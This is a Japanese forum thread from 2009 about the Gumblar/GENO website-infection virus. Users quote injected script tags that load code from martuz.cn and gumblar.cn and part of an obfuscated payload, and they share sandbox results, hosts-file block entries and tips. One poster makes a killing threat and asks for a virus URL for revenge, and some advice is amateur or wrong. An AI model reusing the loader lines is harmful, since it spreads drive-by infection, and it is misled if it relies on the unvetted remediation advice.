検出できるベンダーもバラバラだしウイルスの詳細知らずに結果だけ見たら誤検出?ってレベルじゃないか・・・
229192.168.0.774:2009/05/17(日) 15:11:55 ID:BvZF1aRY0
最新版に更新しても新種が出るかもしれないから安心できないお……
だからadobe削除したお!
230192.168.0.774:2009/05/17(日) 15:12:17 ID:NtSEuLT8Q
感染サイトのURL貼ってる奴、マジで氏ねよ。
231212:2009/05/17(日) 15:12:25 ID:ybsV4IQS0

┃ ____
┃/⌒  ⌒ \
┃ (―) (―) \
┃⌒(__人__)⌒ |
┃       |
┃       /
┃ヽ     ̄/
┃ \   ,;∴~;゚,。
┃ ヽ_)つ'∴・゚゚。∴.;
┃  (::)(::) ヽ ~;゚
┃ /    〉 ) >>226
┃     (___)
232185:2009/05/17(日) 15:16:45 ID:YGxJUpFP0
>>206
WinXPSP3って機種名ではないのでしょうか?
メーカーはマウスです

>>208
ありがとうございます!バー出ました


只今、先生に相談しながらクリーンインストールに挑戦中です
233192.168.0.774:2009/05/17(日) 15:17:56 ID:6zykGUMd0
234192.168.0.774:2009/05/17(日) 15:19:02 ID:BSZ5z9KU0
Adobe Readerは9.1.1が最新型じゃないの?
235192.168.0.774:2009/05/17(日) 15:19:05 ID:+Enx2Z7OP
クリーンインストールって面倒なん?
 
236192.168.0.774:2009/05/17(日) 15:22:35 ID:zPBL8LWuO
>>235
時間かかるし
データも真っ白になるよ
237192.168.0.774:2009/05/17(日) 15:22:38 ID:2KRNOGSH0
>>225

良く分からないけど、それ、誰でも書き込みできるようになってんの?
なってるなら、感染サイトへのリンク張るヤツ出てくるから、
他のヤツに権限を与えない方がよいよ。

そのあたりは大丈夫だと思うけど。
238192.168.0.774:2009/05/17(日) 15:24:42 ID:7TaPV4fL0
AdobeのFlashとReaderを最新にしていたら
感染サイトを踏んでも大丈夫という情報を広めてきます。
239192.168.0.774:2009/05/17(日) 15:29:08 ID:/4yp3BhL0
2ちゃんの専ブラはだいじょうぶなんかねぇ。
オレJaneDoeViewだけど情報収集はここしかわからんのが困るわw
240192.168.0.774:2009/05/17(日) 15:30:27 ID:7TaPV4fL0
URLは極力踏まないようにすればいいよ
241192.168.0.774:2009/05/17(日) 15:30:42 ID:gvZ9d8TtP
ソフ板も見るといいよ
242192.168.0.774:2009/05/17(日) 15:31:20 ID:rsI8zkAT0
>>239
専ブラは平気
243192.168.0.774:2009/05/17(日) 15:32:26 ID:Dx3JCXno0
>>241
URLを張っていただくとありがたい
244192.168.0.774:2009/05/17(日) 15:33:07 ID:Z6bHwWLb0
>>242
IEコンポーネントでも?
245192.168.0.774:2009/05/17(日) 15:33:15 ID:gvZ9d8TtP
ソフトウェア
http://pc12.2ch.net/software/
普通ここまでしない
246192.168.0.774:2009/05/17(日) 15:34:25 ID:1tk6kEt+0
しかし、Adobe Readerはわざと常駐を切らない限り、Adobe Updaterが
更新を知らせてくれるけど、Flashはヤバいね。
大手サイトでフラッシュ使ってるところは要求バージョンを常に最新に
してほしいもんだ。
247192.168.0.774:2009/05/17(日) 15:35:11 ID:Dx3JCXno0
>>245
ありです
248192.168.0.774:2009/05/17(日) 15:35:31 ID:7TaPV4fL0
そりゃないよ
249192.168.0.774:2009/05/17(日) 15:37:28 ID:vH8KoEBz0
>>237見てまともなリンク先かと思って225踏んじまったじゃねーかw
250192.168.0.774:2009/05/17(日) 15:43:52 ID:7yrlZLjk0
>>246
むしろフラッシュを使わないで欲しい
251192.168.0.774:2009/05/17(日) 15:48:45 ID:7TaPV4fL0
うぉっかないなぁ
252192.168.0.774:2009/05/17(日) 15:49:21 ID:6zykGUMd0
アクセス制限中です。しばらく経ってからアクセスしてください。
※ 現在、大規模な攻撃を受けており、このシステムを導入しています。
ご迷惑をかけてすいません。 (o*。_。)oペコッ

チェッカー ><
253192.168.0.774:2009/05/17(日) 15:59:54 ID:MP/sWvjo0
GENOウイルスチェッカー
今入ってるけど まさか俺のせいじゃないよね。
254192.168.0.774:2009/05/17(日) 16:00:53 ID:ilxyL7Fy0
>>219
exeの方を、Normanのサンドボックスに投げ込んだ結果の回答をコピペ
前は34.exeとu.batだったのがファイル名変わってるなぁ。

[ DetectionInfo ]
* Filename: C:\analyzer\scan\martuz_cn_id10_20090517.exe.
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS.
* Compressed: YES.
* TLS hooks: YES.
* Executable type: Application.
* Executable file structure: OK.
* Filetype: PE_I386.

[ General information ]
* Decompressing UPX3.
* File length: 15872 bytes.
* MD5 hash: b0ca69853b371ec9eb58829e869f6f10.

[ Changes to filesystem ]
* Creates file C:\_.e.
* Deletes file c:\sample.exe.
* Creates file C:\e.bat.
* Deletes file "c:\_.e" .
* Deletes file "c:\e.bat".

[ Changes to registry ]
* Accesses Registry key "HKLM\SoFtWARE\Microsoft\Windows nT\currentversion\Drivers32".

[ Process/window information ]
* Creates process "CMD.EXE".

[ Signature Scanning ]
* c:\sample.exe (15872 bytes) : no signature detection.
* C:\_.e (15872 bytes) : no signature detection.
255192.168.0.774:2009/05/17(日) 16:02:33 ID:MDg7JZzS0
ウィルスバスターは何してるの?
256192.168.0.774:2009/05/17(日) 16:05:39 ID:VMAXjN900
お前らウイルスセキュリティ馬鹿にしてるけどいい加減にしろよ?
2ちゃんの連帯感みたいなの感じちゃって調子に乗ってるんだろ?
正直、 うざいから死んでwww(爆藁
信者とか妄想してる暇があったら親孝行しろw糞ww
どうせリアルじゃペコペコしてんだろw
ウイルスセキュリティ以下の人間だよね?
君たちww
妄想と批判しか出来ない哀れな奴らw
ウイルスセキュリティ叩いてどうなる?
お前らマヂ頭使えw
257192.168.0.774:2009/05/17(日) 16:06:51 ID:ovH4yFdR0
>>255
更新キターって聞いたけど自分のところでは黙ったままだ
258192.168.0.774:2009/05/17(日) 16:07:03 ID:MDg7JZzS0
ウィルスバスターいれてるんだけど役に立たないの?
対応してくれないの?
259192.168.0.774:2009/05/17(日) 16:08:37 ID:61lOiijw0
pdf見るのにFoxitReader使ってて、AdobeReaderはインスコしてないんだが、
これってFoxitReader経由でも感染するのか?
260192.168.0.774:2009/05/17(日) 16:09:40 ID:F5MPX4G50
>>246
それはいいね、前回のGENO騒動までアップデートを全くしてなかったから危なかった
261192.168.0.774:2009/05/17(日) 16:12:35 ID:MP/sWvjo0
>>257
俺のノートンもライブアップデートが沈黙してた。
仕方ないので手作業で定義ファイル落としてきた。あくまでもノートンの話。

xxxp://www.omora.pink-no1.net/の入った先menu/menu1.htmlが
危険度200%
かなり危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。

これ危ないのかな?
262blocktxt:2009/05/17(日) 16:18:29 ID:6zykGUMd0
前のうpろだ理由は分からないけど削除されたみたいなんで
こっちに上げておきます。
ttp://uproda.2ch-library.com/lib129639.txt.shtml
263192.168.0.774:2009/05/17(日) 16:18:48 ID:KdAQNY9c0
テメーのサイト見たらウィルスに感染したぞゴルァ路線はどうだろう
264192.168.0.774:2009/05/17(日) 16:19:19 ID:1tk6kEt+0
>>261
ここにはGenoいないっぽいけどな。
リンク先に潜んでるんだろうか。
265192.168.0.774:2009/05/17(日) 16:22:29 ID:MP/sWvjo0
>>264
d。一応入らないにしとく。
266192.168.0.774:2009/05/17(日) 16:22:31 ID:Grc1h74N0
脅威だな 

救急車依頼の恐怖を感じてるんだけど
267192.168.0.774:2009/05/17(日) 16:23:07 ID:oRKg9iVz0
>>266
どんだけ大昔のだよww
268192.168.0.774:2009/05/17(日) 16:29:20 ID:MDg7JZzS0
ウイルスバスターはなにしてるの?
なにもしないの?
269192.168.0.774:2009/05/17(日) 16:30:53 ID:f7PXip0E0
GENOウイルス対策
■hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 zlkon.lv
  127.0.0.1 gumlar.cn
  127.0.0.1 martuz.cn

↑これをちょっと説明して頂けませんか?
270192.168.0.774:2009/05/17(日) 16:33:10 ID:7TaPV4fL0
zlkon.lv
gumlar.cn
martuz.cn

に飛ぼうとすると127.0.0.1に飛ぶってことです。
要するに本来のIPに飛ぼうとするのを防止します。
271192.168.0.774:2009/05/17(日) 16:36:06 ID:CuLRuFv70
>>269
右側のzlkon.lvとかにアクセスしようとする

hostsの内部処理で127.0.0.1に読み替えてそこにアクセスする

127.0.0.1は自分自身なので本当のzlkon.lvのIPアドレスにはアクセスしない

安全
272192.168.0.774:2009/05/17(日) 16:36:26 ID:MDg7JZzS0
ウィルスバスターな何やってるんだよ
早くしてくれよ
感染してるかもしれないのに
273192.168.0.774:2009/05/17(日) 16:36:46 ID:0CtfCDPI0
>>186
これも martuz.cn に飛ばすんだな
<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>

martuz.cnにアク禁くらわせるだけでかなり防げそうだな、こりゃ
274192.168.0.774:2009/05/17(日) 16:37:45 ID:7UVnacRX0
www■laqoo.net■kyouun■pet■index.html
でavast先生がredirector H8検知した。

侵入前にブロックできたって認識でいいのかなぁ。
おかしな挙動は見られないが
275192.168.0.774:2009/05/17(日) 16:40:59 ID:uRUXabUv0
>>269
初期の頃は直接IPが記述してあって、感染中に.exeをダウンロードする為そこに繋ごうとしていた。
ウィルス対策ソフトでそのIPがBANされつつある中、zlkon.lvとかgumlar.cnとか適当なドメイン名を経由して.exeのダウンロードを行おうとする手段が登場
ソフトの対策遅れでまだその経由した方からは繋がっちゃったりが有るんで、

windows標準の "ホスト名>IPの変換を手動で上書きする" 方法によってzlkon.lvやgumlar.cnに繋がないようにする
276192.168.0.774:2009/05/17(日) 16:41:05 ID:0CtfCDPI0
>>198
gumblar.cn にご案内〜
<script src=//gumblar.cn/rss/?id="+j+"><\/script>
277192.168.0.774:2009/05/17(日) 16:42:04 ID:W3Qz58cJ0
>>262
落としたいけど元々住人じゃないんでパスが判らんです
GENOじゃないですよね?
278192.168.0.774:2009/05/17(日) 16:45:11 ID:f7PXip0E0
>>270
ありがとうございます

127.0.0.1がマシン自体を表すアドレスってことは、今調べて分かったのですが
firefoxのAdblock Plusのフィルタリストに「zlkon.lv」「gumlar.cn」「martuz.cn 」
を入れても阻止できるんでしょうか?
279192.168.0.774:2009/05/17(日) 16:48:13 ID:f7PXip0E0
>>271
リロードし忘れたorz

分かりやすい説明ありがとうございます
280192.168.0.774:2009/05/17(日) 16:49:30 ID:6zykGUMd0
>>274
(function(rzm){var x34p='%';eval(unescape(
('v.61r.20a.3d.22.53cript.45ng.69ne.22.2cb.3d.22Version()+・・・・・・

ttp://www.virustotal.com/jp/analisis/f6c9816c6f54c01b06b00a8dc7a44d64
281192.168.0.774:2009/05/17(日) 16:51:53 ID:0CtfCDPI0
>>264 いないよね。でもこんなスクリプトの化け物みたいなページにはブラウザでアクセスしたくないわw
282192.168.0.774:2009/05/17(日) 16:54:08 ID:61lOiijw0
ググったけどAdobeReaderインストールしてなくてFoxit使っててもヤバいのね・・・
Foxitも環境設定でJavaScript切らないと駄目か
283192.168.0.774:2009/05/17(日) 16:55:23 ID:6zykGUMd0
>>264
無し
284192.168.0.774:2009/05/17(日) 17:01:44 ID:7UVnacRX0
>>280
本件まんまですなぁ(´-`)
なんでペットの名前サイトなんかがやられてんだよw
恐ろしくてWEB周れないじゃんこれ
285192.168.0.774:2009/05/17(日) 17:01:54 ID:0CtfCDPI0
>>274
gumblar.cn ご案内コース
<script src=//gumblar.cn/rss/?id="+j+"><\/script>
286192.168.0.774:2009/05/17(日) 17:02:08 ID:LQE1Ao+t0
>>282 俺も使ってる それ気になるな。
287192.168.0.774:2009/05/17(日) 17:11:33 ID:gLr/8LT/0
hostsファイルに以下の行を追加というのは
上と同じように#の中に入れればいいのでしょうか
288192.168.0.774:2009/05/17(日) 17:12:13 ID:MP/sWvjo0
>>264>>281>>283 お手数お掛けしました。

〜かなり判定厳しめに設定してあります。〜
あっちを立てるとコッチが立たず な感じみたいですね。
289192.168.0.774:2009/05/17(日) 17:13:54 ID:CuLRuFv70
>>287
#はその行を無効にする(コメント扱いにする)から不要

127.0.0.0 localhost

というのが普通は最初に入ってるはずだからそれと同じ書き方
290192.168.0.774:2009/05/17(日) 17:14:57 ID:1tk6kEt+0
>>287
先頭に#があるのはコメント行。
#なしで行追加。
291192.168.0.774:2009/05/17(日) 17:16:51 ID:1tk6kEt+0
>>289
なぜか数ヶ月前にWindows Defenderがlocalhostの記述行を削除したよ。
292192.168.0.774:2009/05/17(日) 17:19:00 ID:q8u6cZFi0
やっぱここが一番建設的なスレだな
293192.168.0.774:2009/05/17(日) 17:22:25 ID:gLr/8LT/0
>>289-290
ありがとうございました
294192.168.0.774:2009/05/17(日) 17:23:07 ID:f7PXip0E0
>>278誰か分かりませんでしょうか?
295192.168.0.774:2009/05/17(日) 17:25:09 ID:1tk6kEt+0
>>294
たぶん大丈夫だと思うけど、hosts書きかえちゃった方がより確実。
296192.168.0.774:2009/05/17(日) 17:28:02 ID:0CtfCDPI0
>>294
adblockがどんなもんかは知らんけど、firefoxしか使わないんなら大丈夫なんじゃね?
ただサイトはこれからもどんどん増えるので、この3つさえ入れときゃ明日も安心ってわけじゃないんだけどね

adobeを最新にして全てを忘れるのが一番幸せかも試練
297192.168.0.774:2009/05/17(日) 17:30:02 ID:f7PXip0E0
>>295-296
ありがとうございます、気を付けます
298192.168.0.774:2009/05/17(日) 17:32:19 ID:6zykGUMd0
Spybot - Search & Destroy もhosts書き換えますね
299192.168.0.774:2009/05/17(日) 17:39:49 ID:7TaPV4fL0
はい。
300192.168.0.774:2009/05/17(日) 17:49:24 ID:6zykGUMd0
301192.168.0.774:2009/05/17(日) 17:49:53 ID:7TaPV4fL0
ノートンGJ
302192.168.0.774:2009/05/17(日) 17:58:11 ID:Grc1h74N0
やべえノートンに乗り換えるときがきたかも
303192.168.0.774:2009/05/17(日) 18:01:36 ID:mIA3fiU30
>>300
おお
304192.168.0.774:2009/05/17(日) 18:05:57 ID:O4C38sHjP
今北用ってもう誰か作ってる?
無いなら作るけど
305192.168.0.774:2009/05/17(日) 18:24:33 ID:1tk6kEt+0
>>300
その一方でgumlar.cnは安全。
https://safeweb.norton.com/report/show?name=gumblar.cn

gumlar.cnは実際にもう動作停止状態なのかな?
306192.168.0.774:2009/05/17(日) 18:24:59 ID:Pub4l/uF0
zlkon.lvとgumlar.cnは本当にこのドメインなのか?
SCFに遮断させたら、martuz.cnはおkらしいが、↑二つは「DNSで解決されていません追加しますか?」
だとよ。
307192.168.0.774:2009/05/17(日) 18:25:21 ID:QPPdxGJ80
昨日このウイルスを知って不安だったので書き込みします

【OS】
XP
【使用セキュリティソフト】
avast
【疑った理由】
ニコニコの動画を見る際に『JavaScriptが無効になってます』といったような文字が出て
最新のフラッシュプレイヤーを入れてくださいとの表記が出た。
【症状】
PCがとても重いときがあり、MWPで曲を聴いてたのが音飛びが酷くなり
フリーズ直前までいったこともあった(作業中ではあったが・・・)
【確認手段】
cmd.exe、regedit.exeは使用可能
sqlsodbc.chmのサイズ確認
【結果】
フラッシュプレイヤーを最新にして以降ニコニコは見れるようになった
今のところ怪しげなパケットはなさそうだが不安
308192.168.0.774:2009/05/17(日) 18:28:15 ID:/SoDyIML0
>>300
js切ってても見れるようにしとけよ
309192.168.0.774:2009/05/17(日) 18:28:42 ID:6zykGUMd0
>>305
ほんとだ???
310192.168.0.774:2009/05/17(日) 18:28:53 ID:Pl/Rjd540
>307
報告御苦労
311192.168.0.774:2009/05/17(日) 18:28:59 ID:f7PXip0E0
GENOウイルス対策
■adobe flashplayerを最新版に更新

Adobe Flash PlayerとShockwave Flashって同じものですか?
312192.168.0.774:2009/05/17(日) 18:30:14 ID:Pub4l/uF0
>>311
違う。
313192.168.0.774:2009/05/17(日) 18:32:32 ID:kVP/8H1t0
>>307
それ原因は別だから安心しなさい。
314192.168.0.774:2009/05/17(日) 18:32:51 ID:1tk6kEt+0
>>306
すまん。おれがb抜いちゃってるわw
gumlar.cnでなくgumblar.cnね。
315192.168.0.774:2009/05/17(日) 18:33:56 ID:6zykGUMd0
5/15 21:00ごろにgumblar.cnのAレコードの登録がなくなりました。
Aレコードがなくなりましたのでとりあえずgumblar.cnは意味がなくなりました。ただ、
レジストラによる対策ではない?ようなので
再度Aレコードが登録される可能性があるので、引き続き注意は必要です。

これか?
ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=gumblar%2Ecn+%A4%AB%A4%E9+martuz%2Ecn+%A4%D8
316192.168.0.774:2009/05/17(日) 18:34:11 ID:f7PXip0E0
>>312
んじゃあShockwave Flashってのは最新版に更新しなくてもいいんですよね?
更新のしかた分からないけどw
317192.168.0.774:2009/05/17(日) 18:34:48 ID:jSw80LZp0
>>314
何で抜くんだよ
まさか手打ちなのか?普通コピーだろ
318192.168.0.774:2009/05/17(日) 18:38:45 ID:1tk6kEt+0
>>317
悪かったよぉ。>>269をコピペしちゃったんだよぉ。
319192.168.0.774:2009/05/17(日) 18:39:36 ID:kVP/8H1t0
手打ち職人の朝は早い。
320192.168.0.774:2009/05/17(日) 18:39:49 ID:4DIp3Q850
おい殺すぞ
>>225踏んでサブPC動かなくなった

殺人予告
>>225魔自己rろす
321192.168.0.774:2009/05/17(日) 18:41:13 ID:7TaPV4fL0
もしかして今GENOウイルスまとめサイト重い?
322192.168.0.774:2009/05/17(日) 18:41:36 ID:FkoNww+u0
>>318
今確認してきたら、GENOウィルスチェッカーのhostsファイルもgumlarになっとった。
323192.168.0.774:2009/05/17(日) 18:42:05 ID:Pub4l/uF0
gumblar.cnにしても同じだ。
zlkon.lvも
324192.168.0.774:2009/05/17(日) 18:42:23 ID:7TaPV4fL0
>>317,318
てことはここのも間違えている悪寒w
ここのサイトの人もしみてたら修正求む
http://geno.2ch.tc/
325192.168.0.774:2009/05/17(日) 18:43:56 ID:4DIp3Q850
頼む('A`)
誰か地獄少女にアクセスしたんだが404だ

代わりにGEOウィルスで復讐したいんでURLくれー(VAV)
326192.168.0.774:2009/05/17(日) 18:45:08 ID:1tk6kEt+0
>>323
有効なAレコードを消しちゃってる状態だから名前解決できないんでしょ。
327192.168.0.774:2009/05/17(日) 18:47:09 ID:QPPdxGJ80
>>313
もしよろしければ詳しく教えていただけないでしょうか?
328192.168.0.774:2009/05/17(日) 18:49:30 ID:kVP/8H1t0
NGID 4DIp3Q850 、と。よしスッキリ。
329192.168.0.774:2009/05/17(日) 18:50:18 ID:Pub4l/uF0
詳しくないけど、どちらも逆引き出来ないね。
ttp://safeweb.norton.com/report/show?url=zlkon.lv&.x=5&.y=6
で評価が出ることと、DNSが有効化は別問題?
330192.168.0.774:2009/05/17(日) 18:52:45 ID:1PB83W/v0
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
331192.168.0.774:2009/05/17(日) 18:53:17 ID:E5NPdo1R0
>>316
Shockwave player と Flash playerは別物。
ごっちゃにせず、目を見開いてよく読むこと。
332192.168.0.774:2009/05/17(日) 18:53:35 ID:1tk6kEt+0
>>329
評価した段階ではAレコード有効だったんだと思う。
で、Nortonの評価がグリーンになったところで再度アクティブに
なるかもしれん。
333192.168.0.774:2009/05/17(日) 18:53:45 ID:Dx3JCXno0
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
334192.168.0.774:2009/05/17(日) 18:56:04 ID:Pub4l/uF0
つまりキャッシュ情報表示してたのね。
Nortonのは今日初めて使ったが、意味ないサービスだな
335192.168.0.774:2009/05/17(日) 18:57:24 ID:+UWQkKTW0
まとめサイトが感染したってマジ?
336192.168.0.774:2009/05/17(日) 19:00:24 ID:PGm7MFXg0
>>335
ソースはお前の頭ん中か?
337192.168.0.774:2009/05/17(日) 19:02:16 ID:f7PXip0E0
>>331
どっちもwikiで調べようとすると「Adobe Flash」ってページがでるから
同じ物なのかと思いましてw

adobe flashplayerだけ最新版にしとけばOKってことですよね?
338192.168.0.774:2009/05/17(日) 19:02:19 ID:+UWQkKTW0
>>336
いや、人づてに聞いただけ
事実じゃないならそれでいい
339192.168.0.774:2009/05/17(日) 19:09:37 ID:Rr9xCLR70
>>244

通常使うブラウザは火狐にしとけ。
340192.168.0.774:2009/05/17(日) 19:10:00 ID:DAUhxtRJ0
441 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:32:08.96 ID:K/FFIX2k
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ビコン」公式サイト【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
341192.168.0.774:2009/05/17(日) 19:12:00 ID:pC5ZVjuD0
Warning: fopen() [function.fopen]: Unable to access log/2009516.dat in /virtual/owata-net/public_html/owata-net.com/index.php on line 123

Warning: fopen(log/2009516.dat) [function.fopen]: failed to open stream: No such file or directory in /virtual/owata-net/public_html/owata-net.com/index.php on line 123

毎日チェックしてるサイトでこんなの表示されたけど意味がわからない。
Warning:とか出てるから気味悪いけどgenoと関係ないよね?
セキュ板にも貼ったけど荒れててダメっぽい!
342192.168.0.774:2009/05/17(日) 19:14:49 ID:7TaPV4fL0
チェッカーに通してみて
343192.168.0.774:2009/05/17(日) 19:15:38 ID:aydvb1+C0
「便所の落書き」「痰ツボ」と罵倒されてきた2ちゃんねるがGENOウィルス騒動の解決に
一番大きく貢献するまで、あと五日。


  (「その時歴史が動いた」 2078年5月放送予定)
344192.168.0.774:2009/05/17(日) 19:16:15 ID:kuRpimDu0
>340
コピペにこんなこと言うのもなんだが

×総合ホビー展示即売会「ビコン」
○総合ホビー展示即売会「ホビコン」

ホビーコンプレックスの略でホビコンね。
345192.168.0.774:2009/05/17(日) 19:18:44 ID:6zykGUMd0
★11荒れすぎ w
346192.168.0.774:2009/05/17(日) 19:20:41 ID:4g69K7//0
★1〜2スレあたりはセキュ板とν速がほとんどだったからね
同人・VIPから流れてきてひどいことになった
347192.168.0.774:2009/05/17(日) 19:21:07 ID:qd90in+R0
荒れてるか?
あれくらい大したことないと思うけど
348192.168.0.774:2009/05/17(日) 19:26:28 ID:NUScdqsg0
Chromeも対象になったのが出たとかニュー即で言われたり
背景黒いほうのwikiの「感染したと〜」とアドレスがおかしいとかセキュ板で言われたり
またなんかいろいろ来たらしいけど結局どうなってんのこれ
349192.168.0.774:2009/05/17(日) 19:28:52 ID:OKDvuiXi0
IDも出ないセキュ板の情報なんて信用出来んわ
自演し放題だし
350192.168.0.774:2009/05/17(日) 19:29:20 ID:MP/sWvjo0
何か一行だけになっちゃったよチェッカーのところ。
■hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn

ひょっとしてgumblar.cn zlkon.lv要らないの?
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 martuz.cn
351192.168.0.774:2009/05/17(日) 19:30:07 ID:qTLKsZ5C0
見れない=感染じゃなくて
ただの集中でアクセスできないだけでしょ
352192.168.0.774:2009/05/17(日) 19:30:13 ID:q9beek69O
セキュリティ板 GENOスレ11の9で紹介されていた、
ポート135, 445を閉じたらネットに繋げなくなった。

元に戻そうにもプロパティが表示されない。
デバイスマネージャーやサービスの画面を閉じようとすると
プロパティを閉じろと言われるけど、Alt+Tabで探しても見つからない。
それにコンパネの右半分が真っ白。データフォルダの方は正常に表示されるのに。

誰か助けてください。
353192.168.0.774:2009/05/17(日) 19:32:01 ID:6zykGUMd0
>>350
まだ安心できない
354192.168.0.774:2009/05/17(日) 19:33:43 ID:OKDvuiXi0
ESCなりALT+F4なりで全部終了させて再起動したのかね
右半分が真っ白とか一時的な描画異常なんて誰でも経験する事で
再起動すればまず直る
再起動しても同じというならシラネ
355192.168.0.774:2009/05/17(日) 19:34:19 ID:MP/sWvjo0
>>353
いや、漏れて来るのは解ってるんだけど・・・。
私のトリップは◆XcxlmnqGqUです←――この人何処にいるのかしら。
356192.168.0.774:2009/05/17(日) 19:34:38 ID:4g69K7//0
hxxp://skyhighpremium■com

ここもかな。チェッカーでは1000%とでた
アクセスしたくないし、ソースチェッカー規制くらってる
357192.168.0.774:2009/05/17(日) 19:35:22 ID:DAUhxtRJ0
>>344
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
358192.168.0.774:2009/05/17(日) 19:45:27 ID:0KCBdJWL0
612 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:43:11 ID:I820zXBQ0
http://pc12.2ch.net/test/read.cgi/software/1240881087/611
611 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:30:30 ID:/KeDK9cs0
noscriptの「ブックマークから開いたサイトを許可する」って
履歴とブックマークの管理のウィンドウの履歴から開いても適用されるんだな
www.seibidoshuppan.co.jpここを開き直そうとしたらFlashが再生されたからうんこ漏らしたぜ・・・
martuz.cnを弾いてくれたから事なきだったけど

一応気になったからコピペ
そもそも「ブックマークから開いたサイトを許可する」はチェック入れるべきじゃないと思うけど
359352:2009/05/17(日) 19:48:32 ID:q9beek69O
>>354
それが再起動しても直らんのです。

書き忘れましたがOSは2kです。
携帯じゃ対応策調べようにもままならず…
些細なことでもいいんで、心当たりあれば教えてください。
360192.168.0.774:2009/05/17(日) 19:50:13 ID:7TaPV4fL0
>>358
サンキュー
361192.168.0.774:2009/05/17(日) 19:51:58 ID:4g69K7//0
>>358
^w^;
362192.168.0.774:2009/05/17(日) 19:57:17 ID:OKDvuiXi0
>>359
今内容見てきたがRemote Procedure Call停止って普通しないんじゃね?
そもそもあの内容が正しいかどうかも分からんから試す気にもならん
ただ135/445を閉じた方がいいのは事実なので自分はルータ側で閉じている
(と言うよりデフォルトで閉じられてたが)

元々あちらの板はID出ないし情報信用出来ないよ、見る価値無い
363192.168.0.774:2009/05/17(日) 20:13:01 ID:MpyKmePW0 BE:660438427-2BP(0)
なんだかいろいろご迷惑をおかけしております

>まとめ(黒)が見れない
急激にアクセス増えたので鯖が死にそうになってるみたいです
15時からの5時間でリファラーが2000件以上増えました

>メニューのリンクがおかしい
修正しました
364192.168.0.774:2009/05/17(日) 20:17:00 ID:4g69K7//0
>>188
AVG Anti-Virus Version 86
ttp://pc11.2ch.net/test/read.cgi/sec/1240905473/3

Q5. 2chのログにウィルスが検出されたんですけど
A5. ログに貼られたコードだけではPC内で感染行動をおこすことはできないので無害です。
  AVG User Interface → ツール → 高度な設定 → 常駐シールド → 例外 に
  ログフォルダを追加することで回避できます。
365352:2009/05/17(日) 20:23:37 ID:q9beek69O
>>362
ありがとうございます。いい勉強になりました… orz

迷惑ついでと言っては何ですが、この質問に適切な板を教えてもらえませんか?
板名からすると、PCサロン、windowsあたり?
366192.168.0.774:2009/05/17(日) 20:24:12 ID:zfzbOIpv0
>>363
とりあえず移転も検討してみたら?
http://wikiwiki.jp/
こことかに。解析も出来るみたい。
367192.168.0.774:2009/05/17(日) 20:25:08 ID:sDfaXn0wO
なぜGENOまとめWikiが劇重いんですか
368192.168.0.774:2009/05/17(日) 20:27:26 ID:sDfaXn0wO
>>363見て了解しました。無意味なレス消費して大変申し訳ないです。
369192.168.0.774:2009/05/17(日) 20:28:09 ID:OKDvuiXi0
>>365
この辺でいいんでない?

【マジレス】超初心者の質問に答えるスレ113【エスパー】
http://pc12.2ch.net/test/read.cgi/win/1241574086/

質問の基本だけど、何をしたかは勿論OSやその他環境等なるべく細かく書くようにね
その方が回答者も適切な回答を提示しやすいから
370352:2009/05/17(日) 20:35:14 ID:q9beek69O
>>369
スレまで誘導、ありがとうございます!
このご恩はどこかで誰かに返します。
371192.168.0.774:2009/05/17(日) 20:40:21 ID:MP/sWvjo0
2009 05/17 hostsファイルの古いドメイン二つを消去

martuz.cn一行でいいのね。もう旅に出ます。
372192.168.0.774:2009/05/17(日) 21:14:42 ID:W37Yk44D0
ちょっと気になるが、>>185は、どこで感染したんだ?
>>185の操作のみで感染したとなると、ちょっと不気味だ。

それとも、感染以外の単なるトラブルなのかな。
373192.168.0.774:2009/05/17(日) 21:17:02 ID:O8ZrwtGB0
有志が作って下さった
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認

ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。
374192.168.0.774:2009/05/17(日) 21:19:06 ID:7TaPV4fL0
>>373
感染していた場合、cmd.exeを起動するのは危険とのことです。
375192.168.0.774:2009/05/17(日) 21:23:32 ID:O8ZrwtGB0
>>374
